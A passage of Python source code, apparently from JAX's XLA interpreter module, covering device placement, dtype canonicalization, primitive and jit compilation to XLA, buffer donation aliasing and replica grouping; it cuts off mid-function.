PyLocalBuffer = Any
XlaOp = Any # xla_extension.XlaOp
XlaShape = Any # xla_client.Shape
XlaComputationBuilder = Any # xla_bridge._JaxComputationBuilder
XlaExecutable = Any # xla_extension.LocalExecutable
# This flag is set on exit; no logging should be attempted
_on_exit = False
def compile_or_get_cached(backend, computation, compile_options):
# Avoid import cycle between jax and jax.experimental
from jax.experimental.compilation_cache import compilation_cache as cc
if cc.is_initialized():
cached_executable = cc.get_executable(computation, compile_options)
if cached_executable is not None:
logging.info('Persistent compilation cache hit')
return cached_executable
else:
compiled = backend_compile(backend, computation, compile_options)
cc.put_executable(computation, compile_options, compiled)
return compiled
return backend_compile(backend, computation, compile_options)
def identity(x): return x
_scalar_types = dtypes.python_scalar_dtypes.keys()
# unit representation
def _make_unit_constant(c): return xb.constant_general(c, np.zeros((), dtype=np.dtype('bool')))
def _make_unit_shape(_): return (xc.Shape.array_shape(np.dtype('bool'), ()),)
def _device_put_unit(_, device):
backend = xb.get_device_backend(device)
return (backend.buffer_from_pyval(np.zeros((), dtype=np.dtype('bool')),
device),)
def _make_array_shape(a):
if a.dtype is dtypes.float0:
return (xc.Shape.array_shape(np.dtype('bool'), a.shape),)
else:
return (xc.Shape.array_shape(a.dtype, a.shape),)
def _get_canonical_source_file(frame: source_info_util.Frame):
source_file = frame.file_name
if config.jax_hlo_source_file_canonicalization_regex:
source_file = re.sub(config.jax_hlo_source_file_canonicalization_regex,
'', source_file)
return source_file
tracebacks = {}
def make_op_metadata(primitive: core.Primitive,
params: Dict, *,
name_stack: str = "",
source_info: Optional[source_info_util.Traceback] = None
) -> xc.OpMetadata:
tracebacks[str(pp(name_stack) >> pp_eqn_compact(primitive.name, params))] = source_info
frame = source_info_util.user_frame(source_info) if source_info else None
return xc.OpMetadata(
op_type=primitive.name,
op_name=str(pp(name_stack) >> pp_eqn_compact(primitive.name, params)),
source_file=_get_canonical_source_file(frame) if frame else None,
source_line=frame.line_num if frame else None)
### handlers
xb.register_constant_handler(core.Unit, lambda c, *_: _make_unit_constant(c))
def aval_to_xla_shapes(aval):
try:
return xla_shape_handlers[type(aval)](aval)
except KeyError as err:
raise TypeError(f"No xla_shape_handler for type: {type(aval)}") from err
xla_shape_handlers: Dict[Type[core.AbstractValue], Callable] = {
core.AbstractUnit: _make_unit_shape,
ShapedArray: _make_array_shape,
ConcreteArray: _make_array_shape,
}
def aval_to_result_handler(device: Optional[Device], aval: core.AbstractValue) -> Callable:
try:
return xla_result_handlers[type(aval)](device, aval)
except KeyError as err:
raise TypeError(f"No xla_result_handler for type: {type(aval)}") from err
def array_result_handler(device: Optional[Device], aval: core.ShapedArray):
if aval.dtype is dtypes.float0:
return lambda _: np.zeros(aval.shape, dtypes.float0)
return partial(make_device_array, raise_to_shaped(aval), device)
xla_result_handlers: Dict[Type[core.AbstractValue], Callable[..., Callable]] = {
core.AbstractUnit: lambda _, __: lambda _: core.unit,
ShapedArray: array_result_handler,
ConcreteArray: array_result_handler,
}
def device_put(x, device: Optional[Device] = None) -> Tuple[Any]:
x = canonicalize_dtype(x)
try:
return device_put_handlers[type(x)](x, device)
except KeyError as err:
raise TypeError(f"No device_put handler for type: {type(x)}") from err
def _device_put_array(x, device: Optional[Device]):
backend = xb.get_device_backend(device)
if x.dtype is dtypes.float0:
x = np.zeros(x.shape, dtype=np.dtype(bool))
return (backend.buffer_from_pyval(x, device),)
def _device_put_scalar(x, device):
return _device_put_array(dtypes.coerce_to_array(x), device)
device_put_handlers: Dict[Any, Callable[[Any, Optional[Device]], Tuple[Any]]] = {
core.Unit: _device_put_unit
}
device_put_handlers.update((t, _device_put_array) for t in array_types)
device_put_handlers.update((t, _device_put_scalar) for t in _scalar_types)
# TODO(mattjj): try to remove this canonicalize_dtype stuff
def canonicalize_dtype(x):
typ = type(x)
handler = canonicalize_dtype_handlers.get(typ)
if handler: return handler(x)
for typ in typ.mro():
handler = canonicalize_dtype_handlers.get(typ)
if handler: return handler(x)
if hasattr(x, '__jax_array__'):
return canonicalize_dtype(x.__jax_array__())
raise TypeError(f"No canonicalize_dtype handler for type: {type(x)}")
def _canonicalize_ndarray_dtype(x):
return np.asarray(x, dtypes.canonicalize_dtype(dtypes.result_type(x)))
def _canonicalize_python_scalar_dtype(typ, x):
return np.asarray(
x, dtypes.canonicalize_dtype(dtypes._scalar_type_to_dtype(typ, x)))
canonicalize_dtype_handlers: Dict[Any, Callable] = {core.Unit: identity}
canonicalize_dtype_handlers.update(
(t, _canonicalize_ndarray_dtype) for t in array_types)
canonicalize_dtype_handlers.update(
(t, partial(_canonicalize_python_scalar_dtype, t)) for t in _scalar_types)
def abstractify(x) -> core.AbstractValue:
typ = type(x)
aval_fn = pytype_aval_mappings.get(typ)
if aval_fn: return aval_fn(x)
for typ in typ.mro():
aval_fn = pytype_aval_mappings.get(typ)
if aval_fn: return aval_fn(x)
if hasattr(x, '__jax_array__'):
return abstractify(x.__jax_array__())
raise TypeError(f"Argument '{x}' of type '{type(x)}' is not a valid JAX type")
def _make_abstract_python_scalar(typ, val):
return ShapedArray((), dtypes._scalar_type_to_dtype(typ, val), weak_type=True)
pytype_aval_mappings: Dict[Any, Callable[[Any], core.AbstractValue]] = {
core.Unit: lambda _: core.abstract_unit,
}
pytype_aval_mappings.update((t, make_shaped_array) for t in array_types)
pytype_aval_mappings.update(
(t, partial(_make_abstract_python_scalar, t)) for t in _scalar_types)
# We can optionally set a Jaxpr rewriter that can be applied just before
# compilation. This mechanism is used for compiling id_tap; we can
# remove it once we bring the id_tap implementation into the core.
outfeed_rewriter: Optional[Callable[[core.Jaxpr], core.Jaxpr]] = None
def apply_outfeed_rewriter(jaxpr: core.Jaxpr) -> core.Jaxpr:
if outfeed_rewriter is not None:
return outfeed_rewriter(jaxpr)
else:
return jaxpr
outfeed_primitives: Set[core.Primitive] = set()
def jaxpr_uses_outfeed(jaxpr: core.Jaxpr) -> bool:
"""Finds if there are outfeed primitives anywhere inside a Jaxpr."""
return any(primitive_uses_outfeed(eqn.primitive, eqn.params)
for eqn in jaxpr.eqns)
def _param_uses_outfeed(param):
if type(param) is core.Jaxpr:
if jaxpr_uses_outfeed(param):
return True
elif type(param) is core.ClosedJaxpr:
if jaxpr_uses_outfeed(param.jaxpr):
return True
return False
def primitive_uses_outfeed(prim: core.Primitive, params: Dict) -> bool:
if prim in outfeed_primitives:
return True
for param in params.values():
if isinstance(param, tuple):
if any(unsafe_map(_param_uses_outfeed, param)):
return True
elif _param_uses_outfeed(param):
return True
return False
### op-by-op execution
ArgSpec = Tuple[core.AbstractValue, Optional[Device]]
def arg_spec(x: Any) -> ArgSpec:
aval = abstractify(x)
try:
return aval, x._device
except:
return aval, None
def apply_primitive(prim, *args, **params):
"""Impl rule that compiles and runs a single primitive 'prim' using XLA."""
compiled_fun = xla_primitive_callable(prim, *unsafe_map(arg_spec, args), **params)
return compiled_fun(*args)
def _partition_outputs(avals, outs):
nouts = [aval._num_buffers for aval in avals]
if config.jax_enable_checks:
assert sum(nouts) == len(outs), f"Internal error: sum(nouts)={sum(nouts)} should equal len(outs)={len(outs)}."
outs = iter(outs)
return [[next(outs) for _ in range(nout)] for nout in nouts]
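# For example (an illustrative sketch, not from the original source): if the
# avals report _num_buffers of [1, 2] and outs is [b0, b1, b2], the result is
# [[b0], [b1, b2]], one buffer list per abstract value.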
@cache()
def xla_primitive_callable(prim, *arg_specs: ArgSpec, **params):
avals, arg_devices = unzip2(arg_specs)
donated_invars = (False,) * len(arg_specs)
device = _device_from_arg_devices(arg_devices)
backend = xb.get_device_backend(device)
if primitive_uses_outfeed(prim, params):
# We use the _xla_callable path, where we pre-process the primitives
def prim_fun(*args):
return prim.bind(*args, **params)
return _xla_callable(lu.wrap_init(prim_fun), device, None, "prim", donated_invars,
*arg_specs)
aval_out = prim.abstract_eval(*avals, **params)
if not prim.multiple_results:
handle_result = aval_to_result_handler(device, aval_out)
else:
handlers = map(partial(aval_to_result_handler, device), aval_out)
handle_result = lambda *bufs:\
tuple(handler(*bs) for handler, bs in zip(handlers, _partition_outputs(aval_out, bufs)))
tuple_args = len(avals) > 100
if prim in initial_style_translations:
nreps = initial_style_primitive_replicas(params)
else:
nreps = 1
if nreps > xb.device_count(backend):
raise ValueError(
f"compiling a primitive computation `{prim}` that requires {nreps} "
f"replicas, but only {xb.device_count(backend)} XLA devices are "
f"available on backend {backend.platform}.")
built_c = primitive_computation(prim, AxisEnv(nreps, (), ()), backend,
tuple_args, *avals, **params)
options = xb.get_compile_options(
num_replicas=nreps,
num_partitions=1,
device_assignment=device and (device.id,))
options.parameter_is_tupled_arguments = tuple_args
compiled = backend_compile(backend, built_c, options)
if nreps == 1:
return partial(_execute_compiled_primitive, prim, compiled, handle_result)
else:
return partial(_execute_replicated_primitive, prim, compiled, handle_result)
def _device_from_arg_devices(devices: Sequence[Optional[Device]]) -> Optional[Device]:
"""Given devices of inputs, determine where to perform a computation.
Args:
    devices: list where each element is either a `Device` instance or `None`.
Returns:
A `Device` instance or None.
Raises:
ValueError if input devices are inconsistent.
"""
try:
device, = {d for d in devices if d is not None} or (None,)
return device
except ValueError as err:
msg = "primitive arguments must be colocated on the same device, got {}"
raise ValueError(msg.format(", ".join(map(str, devices)))) from err
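# For example (illustrative only): [None, gpu0, None] returns gpu0 (the one
# committed device wins), [None, None] returns None (let the backend pick a
# default), and [gpu0, gpu1] raises ValueError because the arguments are not
# colocated on the same device.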
@cache()
def primitive_computation(prim, axis_env, backend, tuple_args, *avals, **params):
c = xb.make_computation_builder(f"primitive_computation_{prim.name}")
op_metadata = make_op_metadata(prim, params)
c.set_op_metadata(op_metadata)
platform = xb.get_backend(backend).platform
xla_args, _ = _xla_callable_args(c, avals, tuple_args)
# return val always set as a side-effect on c
if prim in backend_specific_translations[platform]:
rule = backend_specific_translations[platform][prim]
ans = rule(c, *xla_args, **params)
elif prim in translations:
rule = translations[prim]
ans = rule(c, *xla_args, **params)
elif prim in translations_with_avals:
rule = translations_with_avals[prim]
ans = rule(c, avals, xla_args, params)
elif prim in initial_style_translations:
rule = initial_style_translations[prim]
ans = rule(c, axis_env, extend_name_stack(prim.name), avals, backend,
*xla_args, **params)
else:
raise NotImplementedError(f"XLA translation rule for {prim!r} on platform {platform!r} not found")
assert isinstance(ans, xe.XlaOp)
c.clear_op_metadata()
try:
return c.build(ans)
except RuntimeError as e:
msg = (" ".join(map(str, e.args)) + "\n"
"This is a bug in JAX's shape-checking rules; please report it!\n"
"https://github.com/google/jax/issues\n")
raise RuntimeError(msg) from e
def primitive_subcomputation(prim, *avals, **params):
axis_env = AxisEnv(1, (), ())
return primitive_computation(prim, axis_env, None, False, *avals, **params)
def backend_compile(backend, built_c, options):
# we use a separate function call to ensure that XLA compilation appears
# separately in Python profiling results
return backend.compile(built_c, compile_options=options)
def _execute_compiled_primitive(prim, compiled, result_handler, *args):
device, = compiled.local_devices()
input_bufs = list(it.chain.from_iterable(device_put(x, device) for x in args if x is not token))
out_bufs = compiled.execute(input_bufs)
check_special(prim.name, out_bufs)
return result_handler(*out_bufs)
def _execute_replicated_primitive(prim, compiled, result_handler, *args):
input_bufs = [
list(it.chain.from_iterable(device_put(x, device) for x in args if x is not token))
for device in compiled.local_devices()]
out_bufs = [
buf[0] for buf in compiled.execute_sharded_on_local_devices(
list(zip(*input_bufs)))
]
return result_handler(*out_bufs)
def needs_check_special():
return config.jax_debug_infs or config.jax_debug_nans
def check_special(name, bufs):
if needs_check_special():
for buf in bufs:
_check_special(name, buf.xla_shape(), buf)
def _check_special(name, xla_shape, buf):
assert not xla_shape.is_tuple()
if dtypes.issubdtype(xla_shape.element_type(), np.inexact):
if config.jax_debug_nans and np.any(np.isnan(buf.to_py())):
raise FloatingPointError(f"invalid value (nan) encountered in {name}")
if config.jax_debug_infs and np.any(np.isinf(buf.to_py())):
raise FloatingPointError(f"invalid value (inf) encountered in {name}")
### compiling jaxprs
def prefetch(x):
if isinstance(x, DeviceArray):
x.copy_to_host_async()
return x
def jaxpr_literals(jaxpr):
"""Generates all the literals inside a jaxpr, including nested subjaxprs."""
for eqn in jaxpr.eqns:
for v in eqn.invars:
if type(v) is core.Literal:
yield v.val
for subjaxpr in core.subjaxprs(jaxpr):
yield from jaxpr_literals(subjaxpr)
def _flatmap(func: Callable, vars: Sequence):
return list(it.chain.from_iterable(map(func, vars)))
def _partitionmap(func: Callable, vars: Sequence, nodes: Sequence):
return map(func, vars, _partition_outputs([v.aval for v in vars], nodes))
def jaxpr_subcomp(c, jaxpr, backend, axis_env, consts, name_stack, *args):
if backend not in ('cpu', 'gpu', 'tpu'):
platform = xb.get_backend(backend).platform # canonicalize
else:
platform = backend
def read(v):
if type(v) is Literal:
return xb.constant_general(c, canonicalize_dtype(v.val))
else:
return env[v]
def aval(v):
if type(v) is Literal:
return abstractify(v.val)
else:
return v.aval
def write(v, node):
assert node is not None
env[v] = node
env = {}
_partitionmap(write, [core.unitvar], _make_unit_constant(c))
_partitionmap(write, jaxpr.constvars, consts)
_partitionmap(write, jaxpr.invars, args)
for eqn in jaxpr.eqns:
op_metadata = make_op_metadata(
eqn.primitive, eqn.params, name_stack=name_stack,
source_info=eqn.source_info)
c.set_op_metadata(op_metadata)
in_nodes = _flatmap(read, eqn.invars)
# TODO(jakevdp): migrate `translations` table to `translations_with_avals`
if eqn.primitive in backend_specific_translations[platform]:
rule = backend_specific_translations[platform][eqn.primitive]
ans = rule(c, *in_nodes, **eqn.params)
elif eqn.primitive in translations:
ans = translations[eqn.primitive](c, *in_nodes, **eqn.params)
elif eqn.primitive in translations_with_avals:
rule = translations_with_avals[eqn.primitive]
ans = rule(c, map(aval, eqn.invars), in_nodes, eqn.params)
elif eqn.primitive in initial_style_translations:
new_params = check_backend_params(eqn.params, backend)
rule = initial_style_translations[eqn.primitive]
ans = rule(c, axis_env, extend_name_stack(name_stack, eqn.primitive.name),
map(aval, eqn.invars), backend, *in_nodes, **new_params)
elif eqn.primitive in parallel_translations:
rule = parallel_translations[eqn.primitive]
ans = rule(c, *in_nodes, axis_env=axis_env, platform=platform, **eqn.params)
elif eqn.primitive in call_translations:
new_params = check_backend_params(eqn.params, backend)
rule = call_translations[eqn.primitive]
ans = rule(c, axis_env, in_nodes,
name_stack, backend=backend, **new_params)
else:
raise NotImplementedError(
f"XLA translation rule for primitive '{eqn.primitive.name}' not found")
assert isinstance(ans, xe.XlaOp)
c.get_shape(ans) # force xla to do shape error checking
if eqn.primitive.multiple_results or any(v.aval._num_buffers > 1 for v in eqn.outvars):
out_nodes = xla_destructure(c, ans)
else:
out_nodes = [ans]
c.clear_op_metadata()
_partitionmap(write, eqn.outvars, out_nodes)
return _flatmap(read, jaxpr.outvars)
def xla_destructure(c, ans):
num_elements = len(c.get_shape(ans).tuple_shapes())
return [xops.GetTupleElement(ans, i) for i in range(num_elements)]
def check_backend_params(params, outer_backend):
# For nested calls, the outermost call sets the backend for all inner calls;
# it's an error if the inner call has a conflicting explicit backend spec.
inner_backend = params.get('backend', None)
if inner_backend and inner_backend != outer_backend:
raise ValueError(
f"Outer-jit backend specification {outer_backend} must match explicit "
f"inner-jit backend specification {inner_backend}.")
return {k: params[k] for k in params if k != 'backend'}
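# For example (illustrative only): with outer_backend='cpu',
# params={'backend': 'cpu', 'x': 1} yields {'x': 1}, while
# params={'backend': 'gpu', 'x': 1} raises ValueError.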
class AxisEnv(NamedTuple):
"""Represents a pmap mesh (only along the replica axes)."""
nreps: int
names: Tuple[Any, ...]
sizes: Tuple[int, ...]
def extend_axis_env(env: AxisEnv, name, size: int):
return AxisEnv(env.nreps, env.names + (name,), env.sizes + (size,))
def axis_read(axis_env, axis_name):
try:
return max(i for i, name in enumerate(axis_env.names) if name == axis_name)
except ValueError:
raise NameError("unbound axis name: {}".format(axis_name)) from None
def axis_groups(axis_env: AxisEnv, name):
if not isinstance(name, (list, tuple)):
name = (name,)
mesh_axes = tuple(unsafe_map(partial(axis_read, axis_env), name))
trailing_size, ragged = divmod(axis_env.nreps, prod(axis_env.sizes))
assert not ragged
mesh_spec = axis_env.sizes + (trailing_size,)
return _axis_groups(mesh_spec, mesh_axes)
def _axis_groups(mesh_spec, mesh_axes):
"""Computes replica group ids for a collective performed over a subset of the mesh.
Args:
mesh_spec: A sequence of integers representing the mesh shape.
mesh_axes: A sequence of integers between 0 and `len(mesh_spec)` (exclusive)
indicating over which axes the collective is performed.
Returns:
A tuple of replica groups (i.e. tuples containing replica ids).
"""
iota = np.arange(prod(mesh_spec)).reshape(mesh_spec)
groups = np.reshape(
np.moveaxis(iota, mesh_axes, np.arange(len(mesh_axes))),
(prod(np.take(mesh_spec, mesh_axes)), -1))
return tuple(unsafe_map(tuple, groups.T))
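# Worked example (comment added for clarity): _axis_groups((2, 2), (0,)) builds
# iota = [[0, 1], [2, 3]], reshapes it to [[0, 1], [2, 3]] and transposes,
# giving the replica groups ((0, 2), (1, 3)), i.e. the collective runs over
# replicas that differ only along mesh axis 0.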
def jaxpr_replicas(jaxpr) -> int:
"""The number of replicas needed for a jaxpr.
For a eqn, multiply the `axis_size` with the `jaxpr_replicas` of the
subjaxprs. For a list of eqns, take the maximum number of replicas.
"""
if isinstance(jaxpr, core.ClosedJaxpr):
jaxpr = jaxpr.jaxpr
return max(unsafe_map(eqn_replicas, jaxpr.eqns), default=1)
# TODO(mattjj): this function assumes that only pmap has a parameter named
# axis_size, and that it corresponds to cross-replica mapping
def eqn_replicas(eqn):
call_jaxpr = eqn.params.get("call_jaxpr")
if call_jaxpr:
return eqn.params.get('axis_size', 1) * jaxpr_replicas(call_jaxpr)
elif eqn.primitive in initial_style_translations:
return initial_style_primitive_replicas(eqn.params)
else:
return 1
def initial_style_primitive_replicas(params):
return max(core.traverse_jaxpr_params(jaxpr_replicas, params).values(), default=1)
# TODO(mattjj,skyewm): the functions here are utilities for checking if
# not-yet-supported features are used with multi-host programming
def jaxpr_has_pmap(jaxpr):
"""Whether there is an xla_pmap primitive anywhere inside a Jaxpr."""
for eqn in jaxpr.eqns:
if 'xla_pmap' in eqn.primitive.name:
return True
for subjaxpr in core.subjaxprs(jaxpr):
if jaxpr_has_pmap(subjaxpr):
return True
return False
def jaxpr_collectives(jaxpr):
"""Generates all the collective primitives anywhere inside a Jaxpr."""
for eqn in jaxpr.eqns:
if eqn.primitive in parallel_translations:
yield eqn.primitive
for subjaxpr in core.subjaxprs(jaxpr):
yield from jaxpr_collectives(subjaxpr)
### xla_call underlying jit
def _xla_call_impl(fun: lu.WrappedFun, *args, device, backend, name,
donated_invars, inline):
del inline # Only used at tracing time
compiled_fun = _xla_callable(fun, device, backend, name, donated_invars,
*unsafe_map(arg_spec, args))
try:
return compiled_fun(*args)
except FloatingPointError:
assert config.jax_debug_nans or config.jax_debug_infs # compiled_fun can only raise in this case
print("Invalid value encountered in the output of a jit function. "
"Calling the de-optimized version.")
# We want to run the wrapped function again (after _xla_callable already ran
# it), but linear_util.WrappedFun instances are meant to be run only once.
# In addition to re-executing the Python code, which is usually undesirable
# but which config.jax_debug_nans is meant to opt into, we'll be re-executing
# any linear_util.py-style side effects, i.e. re-populating Stores created
# by any transformation_with_aux's applied to fun. Since this is
# intentional here, to avoid "Store occupied" errors we reset the stores to
# be empty.
for store in fun.stores: store and store.reset()
with core.new_sublevel():
return fun.call_wrapped(*args) # probably won't return
def flatten_shape(s: XlaShape) -> Sequence[Tuple[Sequence[int], XlaShape]]:
"""Expands a given shape tree into a flat list of indices to arrays.
Given the following computation:
>>> c = xc.XlaBuilder("example")
>>> p0 = xb.parameter(c, 1, xc.shape_from_pyval(jnp.ones([1])))
>>> p1 = xb.parameter(c, 2, xc.shape_from_pyval(jnp.ones([2])))
>>> p2 = xb.parameter(c, 3, xc.shape_from_pyval(jnp.ones([3])))
>>> o = xops.Tuple(c, [p0, p1, p2])
We can query the arrays in the output tuple:
>>> flatten_shape(c.GetShape(o))
[((0,), f32[1]{0}), ((1,), f32[2]{0}), ((2,), f32[3]{0})]
Or the arrays in one of the parameters (which is itself an array):
>>> flatten_shape(c.GetShape(p0))
[((), f32[1]{0})]
  Args:
s: The input shape.
Returns:
An iterable of pairs of indices and shapes for each array within the shape
tree.
"""
results: List[Tuple[Tuple[int, ...], XlaShape]] = []
_flatten_shape(s, (), results)
return results
def _flatten_shape(s: XlaShape, index: Tuple[int, ...],
results: List[Tuple[Tuple[int, ...], XlaShape]]) -> None:
if s.is_array() or s.is_token():
results.append((index, s))
else:
assert s.is_tuple()
for i, sub in enumerate(s.tuple_shapes()):
_flatten_shape(sub, index + (i,), results)
def _xla_consts(c, consts):
unique_consts = {id(const): const for const in consts}
xla_consts = {
id_: xb.constant_general(c, const) for id_, const in unique_consts.items()}
return [c for const in consts for c in xla_consts[id(const)]]
@lu.cache
def _xla_callable(fun: lu.WrappedFun, device, backend, name, donated_invars, *arg_specs):
if device is not None and backend is not None:
raise ValueError("can't specify both a device and a backend for jit, "
"got device={} and backend={}".format(device, backend))
abstract_args, arg_devices = unzip2(arg_specs)
jaxpr, out_avals, consts = pe.trace_to_jaxpr_final(
fun, abstract_args, pe.debug_info_final(fun, "jit"))
if any(isinstance(c, core.Tracer) for c in consts):
raise UnexpectedTracerError("Encountered an unexpected tracer.")
jaxpr, kept_const_idx, kept_var_idx = _prune_unused_inputs(jaxpr)
consts = [c for i, c in enumerate(consts) if i in kept_const_idx]
pruned_arg_specs = (a for i, a in enumerate(arg_specs) if i in kept_var_idx)
abstract_args, arg_devices = unzip2(pruned_arg_specs)
donated_invars = [
x for i, x in enumerate(donated_invars) if i in kept_var_idx
]
map(prefetch, it.chain(consts, jaxpr_literals(jaxpr)))
jaxpr = apply_outfeed_rewriter(jaxpr)
nreps = jaxpr_replicas(jaxpr)
device = _xla_callable_device(nreps, backend, device, arg_devices)
backend = xb.get_device_backend(device) if device else (
xb.get_backend(backend) if backend is not None else None)
result_handlers = map(partial(aval_to_result_handler, device), out_avals)
# Computations that only produce constants and/or only rearrange their inputs,
# which are often produced from partial evaluation, don't need compilation,
# and don't need to evaluate their arguments.
if not jaxpr.eqns:
return partial(_execute_trivial, jaxpr, device, consts, out_avals,
result_handlers, kept_var_idx)
if not _on_exit:
log_priority = logging.WARNING if config.jax_log_compiles else logging.DEBUG
logging.log(log_priority, "Compiling %s (%s) for args %s.",
fun.__name__, id(fun), abstract_args)
if nreps > 1:
warn(f"The jitted function {fun.__name__} includes a pmap. Using "
"jit-of-pmap can lead to inefficient data movement, as the outer jit "
"does not preserve sharded data representations and instead collects "
"input and output arrays onto a single device. "
"Consider removing the outer jit unless you know what you're doing. "
"See https://github.com/google/jax/issues/2926.")
if nreps > xb.device_count(backend):
raise ValueError(
f"compiling computation that requires {nreps} replicas, but only "
f"{xb.device_count(backend)} XLA devices are available")
if xb.process_count() > 1 and (nreps > 1 or jaxpr_has_pmap(jaxpr)):
raise NotImplementedError(
"jit of multi-host pmap not implemented (and jit-of-pmap can cause "
"extra data movement anyway, so maybe you don't want it after all).")
tuple_args = len(abstract_args) > 100 # pass long arg lists as tuple for TPU
c = xb.make_computation_builder("jit_{}".format(fun.__name__))
xla_consts = _xla_consts(c, consts)
xla_args, donated_invars = _xla_callable_args(c, abstract_args, tuple_args,
donated_invars=donated_invars)
out_nodes = jaxpr_subcomp(
c, jaxpr, backend.platform if backend is not None else None,
AxisEnv(nreps, (), ()), xla_consts,
extend_name_stack(wrap_name(name, 'jit')), *xla_args)
backend = xb.get_backend(backend)
out_tuple = xops.Tuple(c, out_nodes)
if backend.platform in ("gpu", "tpu"):
donated_invars = set_up_aliases(c, xla_args, out_tuple, donated_invars, tuple_args)
if any(donated_invars):
# TODO(tomhennigan): At call time we should mark these buffers as deleted.
unused_donations = [str(c.GetShape(a))
for a, d in zip(xla_args, donated_invars) if d]
warn("Some donated buffers were not usable: {}".format(", ".join(unused_donations)))
built = c.build(out_tuple)
options = xb.get_compile_options(
num_replicas=nreps,
num_partitions=1,
device_assignment=(device.id,) if device else None)
options.parameter_is_tupled_arguments = tuple_args
compiled = compile_or_get_cached(backend, built, options)
if nreps == 1:
return partial(_execute_compiled, compiled, out_avals, result_handlers,
kept_var_idx)
else:
return partial(_execute_replicated, compiled, out_avals, result_handlers,
kept_var_idx)
def set_up_aliases(c, xla_args, out_tuple, donated_args, tuple_args):
"""Configures input/output "must" aliasing based on `donated_args`."""
# First for every input array add it to `donations` iff it is a member of
# `donated_args`.
donations = defaultdict(deque)
for arg_index, arg in enumerate(xla_args):
if donated_args[arg_index]:
for param_index, element in flatten_shape(c.GetShape(arg)):
key = (element.dimensions(), element.xla_element_type())
if tuple_args:
param_number = 0
param_index = (arg_index,) + tuple(param_index)
donations[key].append((param_number, param_index, arg_index))
else:
param_number = arg_index
donations[key].append((param_number, param_index, arg_index))
# Consume donations for outputs.
out_donated_args = list(donated_args)
for output_index, element in flatten_shape(c.GetShape(out_tuple)):
key = (element.dimensions(), element.xla_element_type())
if donations.get(key, ()):
param_number, param_index, arg_index = donations[key].popleft()
out_donated_args[arg_index] = False
c.setup_alias(output_index, param_number, param_index)
return tuple(out_donated_args)
def _prune_unused_inputs(
jaxpr: core.Jaxpr) -> Tuple[core.Jaxpr, Set[int], Set[int]]:
used = {v for v in jaxpr.outvars if isinstance(v, core.Var)}
# TODO(zhangqiaorjc): Improve the DCE algorithm by also pruning primitive
# applications that do not produce used outputs. Must handle side-effecting
# primitives and nested jaxpr.
used.update(
v for eqn in jaxpr.eqns for v in eqn.invars if isinstance(v, core.Var))
kept_const_idx, new_constvars = unzip2(
(i, v) for i, v in enumerate(jaxpr.constvars) if v in used)
kept_var_idx, new_invars = unzip2(
(i, v) for i, v in enumerate(jaxpr.invars) if v in used)
new_jaxpr = core.Jaxpr(new_constvars, new_invars, jaxpr.outvars, jaxpr.eqns)
return new_jaxpr, set(kept_const_idx), set(kept_var_idx)
def _xla_callable_device(nreps, backend, device, arg_devices):
if nreps > 1:
if device is not None or backend is not None:
raise ValueError(f"can't specify device or backend for jit-of-pmap, "
f"got device={device} and backend={backend}")
return None
else:
if device is None and backend is None:
return _device_from_arg_devices(arg_devices)
elif device is not None and backend is None:
return device
elif device is None and backend is not None:
return xb.get_backend(backend).get_default_device_assignment(1)[0]
else:
assert False # Unreachable given the error check in _xla_callable
# Used within _xla_callable_args and _xla_param to distinguish between None (no
# sharding annotation set) and replicated.
_replicated_param = object()
def _xla_callable_args(
c, avals, tuple_args, *,
replicated=None,
partitions=None,
partitions_proto: bool = False,
donated_invars=None):
assert partitions is None or len(partitions) == len(avals)
if not tuple_args:
if replicated is None:
replicated = [None] * len(avals)
if partitions is None:
parts: List[object] = [None] * len(avals)
elif partitions_proto:
parts = partitions
else:
parts = [_replicated_param if part is None else part
for part in partitions]
counts = it.count()
xla_args = [_xla_param(c, next(counts), xla_shape, r, p, partitions_proto)
if a is not abstract_token else xops.CreateToken(c)
for (a, r, p) in safe_zip(avals, replicated, parts)
for xla_shape in aval_to_xla_shapes(a)]
if donated_invars is not None:
donated_invars = [
d for (a, _, _, d) in zip(avals, replicated, parts, donated_invars)
for xla_shape in aval_to_xla_shapes(a)]
return xla_args, donated_invars
else:
if replicated is not None:
replicated = [r for a, r in zip(avals, replicated)
if a is not abstract_token]
if partitions is None:
tuple_parts = None
elif partitions_proto:
tuple_parts = xb.tuple_sharding_proto(partitions)
else:
tuple_parts = tuple(partitions)
tuple_shape = xc.Shape.tuple_shape(
[shape for a in avals for shape in aval_to_xla_shapes(a) if a is not abstract_token])
tuple_param = _xla_param(c, 0, tuple_shape, replicated, tuple_parts, partitions_proto)
xla_inputs = iter(xla_destructure(c, tuple_param))
xla_args = [next(xla_inputs) if a is not abstract_token else
xops.CreateToken(c) for a in avals]
assert next(xla_inputs, None) is None
return xla_args, donated_invars
def _xla_param(builder, param_num, xla_shape, replicated, partitions, parts_proto):
make_param = partial(xb.parameter, builder, param_num, xla_shape,
replicated=replicated)
with_sharding = xb.with_sharding_proto if parts_proto else xb.with_sharding
if partitions is None:
return make_param()
elif partitions is _replicated_param:
return with_sharding(builder, None, make_param)
else:
return with_sharding(builder, partitions, make_param)
def _execute_compiled(compiled: XlaExecutable, avals, handlers, kept_var_idx,
*args):
device, = compiled.local_devices()
input_bufs = list(
it.chain.from_iterable(
device_put(x, device)
for i, x in enumerate(args)
if x is not token and i in kept_var_idx))
out_bufs = compiled.execute(input_bufs)
check_special(xla_call_p.name, out_bufs)
return [handler(*bs) for handler, bs in zip(handlers, _partition_outputs(avals, out_bufs))]
def _execute_replicated(compiled: XlaExecutable, avals, handlers, kept_var_idx,
*args):
input_bufs = [
list(
it.chain.from_iterable(
device_put(x, device)
for i, x in enumerate(args)
if x is not token and i in kept_var_idx))
for device in compiled.local_devices()
]
out_bufs = [
buf[0] for buf in compiled.execute_sharded_on_local_devices(
list(zip(*input_bufs)))
]
check_special(xla_call_p.name, out_bufs)
return [handler(*bs) for handler, bs in zip(handlers, _partition_outputs(avals, out_bufs))]
def _execute_trivial(jaxpr, device: Optional[Device], consts, avals, handlers,
kept_var_idx, *args):
env = {core.unitvar: core.unit}
pruned_args = (x for i, x in enumerate(args) if i in kept_var_idx)
map(env.setdefault, jaxpr.invars, pruned_args)
map(env.setdefault, jaxpr.constvars, consts)
outs = [canonicalize_dtype(v.val) if type(v) is Literal else env[v]
for v in jaxpr.outvars]
return [_copy_device_array_to_device(x, device) if type_is_device_array(x)
else h(*device_put(x, device)) for h, x in zip(handlers, outs)]
xla_call_p: core.CallPrimitive = core.CallPrimitive('xla_call')
xla_call = xla_call_p.bind
xla_call_p.def_impl(_xla_call_impl)
def _xla_call_partial_eval_update_params(params, in_unknowns):
call_jaxpr = params['call_jaxpr']
donated_invars = params['donated_invars']
if not in_unknowns and donated_invars:
